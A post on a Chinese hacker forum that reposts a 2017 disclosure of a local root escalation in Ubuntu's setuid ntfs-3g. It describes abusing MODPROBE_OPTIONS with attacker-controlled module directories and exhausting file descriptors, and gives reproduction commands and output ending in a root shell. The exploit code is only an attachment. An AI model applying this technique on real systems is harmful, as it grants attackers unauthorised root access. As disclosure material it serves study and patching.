搜索
查看: 848|回复: 0

ubuntu root提权exploit ​​​​

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-2-16 11:11:39 | 显示全部楼层 |阅读模式
  1. ntfs-3g is installed by default e.g. on Ubuntu and comes with a
  2. setuid root program /bin/ntfs-3g. When this program is invoked on a
  3. system whose kernel does not support FUSE filesystems (detected by
  4. get_fuse_fstype()), ntfs-3g attempts to load the "fuse" module using
  5. /sbin/modprobe via load_fuse_module().

  6. The issue is that /sbin/modprobe is not designed to run in a setuid
  7. context. As the manpage of modprobe explicitly points out:

  8.        The MODPROBE_OPTIONS environment variable can also be used
  9.        to pass arguments to modprobe.

  10. Therefore, on a system that does not seem to support FUSE filesystems,
  11. an attacker can set the environment variable MODPROBE_OPTIONS to
  12. something like "-C /tmp/evil_config -d /tmp/evil_root" to force
  13. modprobe to load its configuration and the module from
  14. attacker-controlled directories. This allows a local attacker to load
  15. arbitrary code into the kernel.

  16. In practice, the FUSE module is usually already loaded. However, the
  17. issue can still be attacked because a failure to open
  18. /proc/filesystems (meaning that get_fuse_fstype() returns
  19. FSTYPE_UNKNOWN) always causes modprobe to be executed, even if the
  20. FUSE module is already loaded. An attacker can cause an attempt to
  21. open /proc/filesystems to fail by exhausting the global limit on the
  22. number of open file descriptions (/proc/sys/fs/file-max).

  23. I have attached an exploit for the issue. I have tested it in a VM
  24. with Ubuntu Server 16.10. To reproduce, unpack the attached file,
  25. compile the exploit and run it:

  26. user@ubuntu:~$ tar xf ntfs-3g-modprobe-unsafe.tar
  27. user@ubuntu:~$ cd ntfs-3g-modprobe-unsafe/
  28. user@ubuntu:~/ntfs-3g-modprobe-unsafe$ ./compile.sh
  29. make: Entering directory '/usr/src/linux-headers-4.8.0-32-generic'
  30.   CC [M]  /home/user/ntfs-3g-modprobe-unsafe/rootmod.o
  31.   Building modules, stage 2.
  32.   MODPOST 1 modules
  33.   CC      /home/user/ntfs-3g-modprobe-unsafe/rootmod.mod.o
  34.   LD [M]  /home/user/ntfs-3g-modprobe-unsafe/rootmod.ko
  35. make: Leaving directory '/usr/src/linux-headers-4.8.0-32-generic'
  36. depmod: WARNING: could not open /home/user/ntfs-3g-modprobe-unsafe/depmod_tmp//lib/modules/4.8.0-32-generic/modules.order: No such file or directory
  37. depmod: WARNING: could not open /home/user/ntfs-3g-modprobe-unsafe/depmod_tmp//lib/modules/4.8.0-32-generic/modules.builtin: No such file or directory
  38. user@ubuntu:~/ntfs-3g-modprobe-unsafe$ ./sploit
  39. looks like we won the race
  40. got ENFILE at 198088 total
  41. Failed to open /proc/filesystems: Too many open files in system
  42. yay, modprobe ran!
  43. modprobe: ERROR: ../libkmod/libkmod.c:514 lookup_builtin_file() could not open builtin file '/tmp/ntfs_sploit.u48sGO/lib/modules/4.8.0-32-generic/modules.builtin.bin'
  44. modprobe: ERROR: could not insert 'rootmod': Too many levels of symbolic links
  45. Error opening '/tmp/ntfs_sploit.u48sGO/volume': Is a directory
  46. Failed to mount '/tmp/ntfs_sploit.u48sGO/volume': Is a directory
  47. we have root privs now...
  48. root@ubuntu:~/ntfs-3g-modprobe-unsafe# id
  49. uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lxd),123(libvirt),127(sambashare),128(lpadmin),1000(user)

  50. Note: The exploit seems to work relatively reliably in VMs with
  51. multiple CPU cores, but not in VMs with a single CPU core. If you
  52. test this exploit in a VM, please ensure that the VM has at least two
  53. CPU cores.

  54. This bug is subject to a 90 day disclosure deadline. If 90 days elapse
  55. without a broadly available patch, then the bug report will automatically
  56. become visible to the public.
复制代码




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表